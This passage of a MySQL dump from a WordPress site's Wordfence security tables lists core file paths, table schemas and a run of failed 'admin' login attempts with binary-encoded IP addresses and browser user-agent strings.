st-api/search/class-wp-rest-post-search-handler.php'),(7666,'wp-includes/rest-api/search/class-wp-rest-search-handler.php'),(7667,'wp-includes/rest-api/search/class-wp-rest-term-search-handler.php'),(7668,'wp-includes/rest-api.php'),(7669,'wp-includes/revision.php'),(7670,'wp-includes/rewrite.php'),(7671,'wp-includes/robots-template.php'),(7672,'wp-includes/rss-functions.php'),(7673,'wp-includes/rss.php'),(7674,'wp-includes/script-loader.php'),(7675,'wp-includes/session.php'),(7676,'wp-includes/shortcodes.php'),(7677,'wp-includes/sitemaps/class-wp-sitemaps-index.php'),(7678,'wp-includes/sitemaps/class-wp-sitemaps-provider.php'),(7679,'wp-includes/sitemaps/class-wp-sitemaps-registry.php'),(7680,'wp-includes/sitemaps/class-wp-sitemaps-renderer.php'),(7681,'wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php'),(7682,'wp-includes/sitemaps/class-wp-sitemaps.php'),(7683,'wp-includes/sitemaps/providers/class-wp-sitemaps-posts.php'),(7684,'wp-includes/sitemaps/providers/class-wp-sitemaps-taxonomies.php'),(7685,'wp-includes/sitemaps/providers/class-wp-sitemaps-users.php'),(7686,'wp-includes/sitemaps.php'),(7687,'wp-includes/sodium_compat/LICENSE'),(7688,'wp-includes/sodium_compat/autoload-php7.php'),(7689,'wp-includes/sodium_compat/autoload.php'),(7690,'wp-includes/sodium_compat/composer.json'),(7691,'wp-includes/sodium_compat/lib/constants.php'),(7692,'wp-includes/sodium_compat/lib/namespaced.php'),(7693,'wp-includes/sodium_compat/lib/php72compat.php'),(7694,'wp-includes/sodium_compat/lib/php72compat_const.php'),(7695,'wp-includes/sodium_compat/lib/sodium_compat.php'),(7696,'wp-includes/sodium_compat/namespaced/Compat.php'),(7697,'wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php'),(7698,'wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php'),(7699,'wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php'),(7700,'wp-includes/sodium_compat/namespaced/Core/ChaCha20.php'),(7701,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php'),(7702,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php'),(7703,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php'),(7704,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php'),(7705,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php'),(7706,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php'),(7707,'wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php'),(7708,'wp-includes/sodium_compat/namespaced/Core/Curve25519.php'),(7709,'wp-includes/sodium_compat/namespaced/Core/Ed25519.php'),(7710,'wp-includes/sodium_compat/namespaced/Core/HChaCha20.php'),(7711,'wp-includes/sodium_compat/namespaced/Core/HSalsa20.php'),(7712,'wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php'),(7713,'wp-includes/sodium_compat/namespaced/Core/Poly1305.php'),(7714,'wp-includes/sodium_compat/namespaced/Core/Salsa20.php'),(7715,'wp-includes/sodium_compat/namespaced/Core/SipHash.php'),(7716,'wp-includes/sodium_compat/namespaced/Core/Util.php'),(7717,'wp-includes/sodium_compat/namespaced/Core/X25519.php'),(7718,'wp-includes/sodium_compat/namespaced/Core/XChaCha20.php'),(7719,'wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php'),(7720,'wp-includes/sodium_compat/namespaced/Crypto.php'),(7721,'wp-includes/sodium_compat/namespaced/File.php'),(7722,'wp-includes/sodium_compat/src/Compat.php'),(7723,'wp-includes/sodium_compat/src/Core/BLAKE2b.php'),(7724,'wp-includes/sodium_compat/src/Core/Base64/Common.php'),(7725,'wp-includes/sodium_compat/src/Core/Base64/Original.php'),(7726,'wp-includes/sodium_compat/src/Core/Base64/UrlSafe.php'),(7727,'wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php'),(7728,'wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php'),(7729,'wp-includes/sodium_compat/src/Core/ChaCha20.php'),(7730,'wp-includes/sodium_compat/src/Core/Curve25519/Fe.php'),(7731,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php'),(7732,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php'),(7733,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php'),(7734,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php'),(7735,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php'),(7736,'wp-includes/sodium_compat/src/Core/Curve25519/H.php'),(7737,'wp-includes/sodium_compat/src/Core/Curve25519/README.md'),(7738,'wp-includes/sodium_compat/src/Core/Curve25519.php'),(7739,'wp-includes/sodium_compat/src/Core/Ed25519.php'),(7740,'wp-includes/sodium_compat/src/Core/HChaCha20.php'),(7741,'wp-includes/sodium_compat/src/Core/HSalsa20.php'),(7742,'wp-includes/sodium_compat/src/Core/Poly1305/State.php'),(7743,'wp-includes/sodium_compat/src/Core/Poly1305.php'),(7744,'wp-includes/sodium_compat/src/Core/Salsa20.php'),(7745,'wp-includes/sodium_compat/src/Core/SecretStream/State.php'),(7746,'wp-includes/sodium_compat/src/Core/SipHash.php'),(7747,'wp-includes/sodium_compat/src/Core/Util.php'),(7748,'wp-includes/sodium_compat/src/Core/X25519.php'),(7749,'wp-includes/sodium_compat/src/Core/XChaCha20.php'),(7750,'wp-includes/sodium_compat/src/Core/XSalsa20.php'),(7751,'wp-includes/sodium_compat/src/Core32/BLAKE2b.php'),(7752,'wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php'),(7753,'wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php'),(7754,'wp-includes/sodium_compat/src/Core32/ChaCha20.php'),(7755,'wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php'),(7756,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php'),(7757,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php'),(7758,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php'),(7759,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php'),(7760,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php'),(7761,'wp-includes/sodium_compat/src/Core32/Curve25519/H.php'),(7762,'wp-includes/sodium_compat/src/Core32/Curve25519/README.md'),(7763,'wp-includes/sodium_compat/src/Core32/Curve25519.php'),(7764,'wp-includes/sodium_compat/src/Core32/Ed25519.php'),(7765,'wp-includes/sodium_compat/src/Core32/HChaCha20.php'),(7766,'wp-includes/sodium_compat/src/Core32/HSalsa20.php'),(7767,'wp-includes/sodium_compat/src/Core32/Int32.php'),(7768,'wp-includes/sodium_compat/src/Core32/Int64.php'),(7769,'wp-includes/sodium_compat/src/Core32/Poly1305/State.php'),(7770,'wp-includes/sodium_compat/src/Core32/Poly1305.php'),(7771,'wp-includes/sodium_compat/src/Core32/Salsa20.php'),(7772,'wp-includes/sodium_compat/src/Core32/SecretStream/State.php'),(7773,'wp-includes/sodium_compat/src/Core32/SipHash.php'),(7774,'wp-includes/sodium_compat/src/Core32/Util.php'),(7775,'wp-includes/sodium_compat/src/Core32/X25519.php'),(7776,'wp-includes/sodium_compat/src/Core32/XChaCha20.php'),(7777,'wp-includes/sodium_compat/src/Core32/XSalsa20.php'),(7778,'wp-includes/sodium_compat/src/Crypto.php'),(7779,'wp-includes/sodium_compat/src/Crypto32.php'),(7780,'wp-includes/sodium_compat/src/File.php'),(7781,'wp-includes/sodium_compat/src/PHP52/SplFixedArray.php'),(7782,'wp-includes/sodium_compat/src/SodiumException.php'),(7783,'wp-includes/spl-autoload-compat.php'),(7784,'wp-includes/taxonomy.php'),(7785,'wp-includes/template-loader.php'),(7786,'wp-includes/template.php'),(7787,'wp-includes/theme-compat/comments.php'),(7788,'wp-includes/theme-compat/embed-404.php'),(7789,'wp-includes/theme-compat/embed-content.php'),(7790,'wp-includes/theme-compat/embed.php'),(7791,'wp-includes/theme-compat/footer-embed.php'),(7792,'wp-includes/theme-compat/footer.php'),(7793,'wp-includes/theme-compat/header-embed.php'),(7794,'wp-includes/theme-compat/header.php'),(7795,'wp-includes/theme-compat/sidebar.php'),(7796,'wp-includes/theme.php'),(7797,'wp-includes/update.php'),(7798,'wp-includes/user.php'),(7799,'wp-includes/vars.php'),(7800,'wp-includes/version.php'),(7801,'wp-includes/widgets/class-wp-nav-menu-widget.php'),(7802,'wp-includes/widgets/class-wp-widget-archives.php'),(7803,'wp-includes/widgets/class-wp-widget-calendar.php'),(7804,'wp-includes/widgets/class-wp-widget-categories.php'),(7805,'wp-includes/widgets/class-wp-widget-custom-html.php'),(7806,'wp-includes/widgets/class-wp-widget-links.php'),(7807,'wp-includes/widgets/class-wp-widget-media-audio.php'),(7808,'wp-includes/widgets/class-wp-widget-media-gallery.php'),(7809,'wp-includes/widgets/class-wp-widget-media-image.php'),(7810,'wp-includes/widgets/class-wp-widget-media-video.php'),(7811,'wp-includes/widgets/class-wp-widget-media.php'),(7812,'wp-includes/widgets/class-wp-widget-meta.php'),(7813,'wp-includes/widgets/class-wp-widget-pages.php'),(7814,'wp-includes/widgets/class-wp-widget-recent-comments.php'),(7815,'wp-includes/widgets/class-wp-widget-recent-posts.php'),(7816,'wp-includes/widgets/class-wp-widget-rss.php'),(7817,'wp-includes/widgets/class-wp-widget-search.php'),(7818,'wp-includes/widgets/class-wp-widget-tag-cloud.php'),(7819,'wp-includes/widgets/class-wp-widget-text.php'),(7820,'wp-includes/widgets.php'),(7821,'wp-includes/wlwmanifest.xml'),(7822,'wp-includes/wp-db.php'),(7823,'wp-includes/wp-diff.php'),(7824,'wp-links-opml.php'),(7825,'wp-load.php'),(7826,'wp-login.php'),(7827,'wp-mail.php'),(7828,'wp-settings.php'),(7829,'wp-signup.php'),(7830,'wp-trackback.php'),(7831,'xmlrpc.php');
/*!40000 ALTER TABLE `wp_wfknownfilelist` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wflivetraffichuman`
--

DROP TABLE IF EXISTS `wp_wflivetraffichuman`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wflivetraffichuman` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `identifier` binary(32) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `expiration` int(10) unsigned NOT NULL,
  PRIMARY KEY (`IP`,`identifier`),
  KEY `expiration` (`expiration`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wflivetraffichuman`
--

LOCK TABLES `wp_wflivetraffichuman` WRITE;
/*!40000 ALTER TABLE `wp_wflivetraffichuman` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wflivetraffichuman` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wflocs`
--

DROP TABLE IF EXISTS `wp_wflocs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wflocs` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `ctime` int(10) unsigned NOT NULL,
  `failed` tinyint(3) unsigned NOT NULL,
  `city` varchar(255) DEFAULT '',
  `region` varchar(255) DEFAULT '',
  `countryName` varchar(255) DEFAULT '',
  `countryCode` char(2) DEFAULT '',
  `lat` float(10,7) DEFAULT 0.0000000,
  `lon` float(10,7) DEFAULT 0.0000000,
  PRIMARY KEY (`IP`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wflocs`
--

LOCK TABLES `wp_wflocs` WRITE;
/*!40000 ALTER TABLE `wp_wflocs` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wflocs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wflogins`
--

DROP TABLE IF EXISTS `wp_wflogins`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wflogins` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `hitID` int(11) DEFAULT NULL,
  `ctime` double(17,6) unsigned NOT NULL,
  `fail` tinyint(3) unsigned NOT NULL,
  `action` varchar(40) NOT NULL,
  `username` varchar(255) NOT NULL,
  `userID` int(10) unsigned NOT NULL,
  `IP` binary(16) DEFAULT NULL,
  `UA` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `k1` (`IP`,`fail`),
  KEY `hitID` (`hitID`)
) ENGINE=InnoDB AUTO_INCREMENT=4520 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wflogins`
--

LOCK TABLES `wp_wflogins` WRITE;
/*!40000 ALTER TABLE `wp_wflogins` DISABLE KEYS */;
INSERT INTO `wp_wflogins` VALUES (2430,4423,1628421490.346198,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����e�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'),(2431,4425,1628421581.724227,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���1K','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2432,4425,1628421581.779973,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���1K','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2433,4426,1628421611.542007,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2434,4426,1628421611.624026,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2435,4434,1628422820.294558,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gZ�(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2436,4435,1628423150.701205,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2437,4436,1628423150.911536,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Y���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2438,4438,1628423450.712793,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/�=�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),(2439,4440,1628423579.971235,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@Z(d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2440,4441,1628423941.522931,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]qo\"','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2441,4442,1628423943.285686,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��pNH','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2442,4443,1628424289.945460,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���>p{','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36'),(2443,4444,1628424339.559135,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]qo\"','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2444,4445,1628424343.985971,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"Q�n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2445,4446,1628424740.436775,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�ʖ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2446,4447,1628424740.930550,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����^E','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2447,4448,1628425142.305708,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2448,4449,1628425144.004080,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Kw��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2449,4450,1628425198.340737,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��=��','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(2450,4454,1628425932.594918,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��B*:�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2451,4455,1628426100.609896,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]sO','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'),(2452,4460,1628426989.255893,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;v�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(2453,4461,1628427061.514519,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����M','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(2454,4463,1628427130.399908,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_�+�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2455,4465,1628427532.023461,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2456,4474,1628429073.330887,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����e�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(2457,4475,1628429131.614691,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�t2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2458,4477,1628429529.964430,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2459,4478,1628429530.934696,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��B*:�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2460,4479,1628429931.406276,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]qod','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2461,4481,1628429985.189393,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]�_','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'),(2462,4486,1628430973.054389,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/�=�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(2463,4487,1628431049.482912,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\rKz','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(2464,4488,1628431141.366870,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��i9o','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2465,4489,1628431141.926758,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2466,4492,1628431952.098284,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g8�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2467,4493,1628431965.788563,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��D�\\*','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(2468,4494,1628431977.231873,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_�+�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2469,4504,1628435940.794221,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-(��','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'),(2470,4507,1628437011.551979,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����%+','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36'),(2471,4511,1628438992.493472,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_�~�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(2472,4512,1628439891.311349,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�\Z','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(2473,4514,1628442841.395812,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����g$','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),(2474,4517,1628443820.867704,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��6&I�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(2475,4518,1628444021.862058,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"^��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2476,4519,1628444780.774208,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���6x]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2477,4520,1628444809.527806,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��2&�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36'),(2478,4522,1628445174.547980,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���옔','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2479,4523,1628445540.703337,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����m','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2480,4524,1628445804.520917,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���wң','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36'),(2481,4525,1628445886.551214,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����U�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'),(2482,4526,1628445922.536031,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���c�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2483,4527,1628446308.209661,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��n��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2484,4528,1628446693.175723,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2485,4530,1628447471.168716,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Q֨','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2486,4531,1628447862.128887,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k��2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2487,4532,1628448255.481012,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gx�V','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2488,4532,1628448255.566096,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gx�V','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2489,4535,1628449434.570614,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Oe,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2490,4537,1628450253.908486,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����q','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2491,4537,1628450253.929662,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����q','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2492,4539,1628451016.096834,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2493,4540,1628451422.872337,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2494,4542,1628451801.614121,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@v7','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2495,4544,1628452593.684530,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��D�D�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2496,4546,1628453421.222199,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��{9�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2497,4547,1628453793.452272,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2498,4549,1628454591.557971,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ν�$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 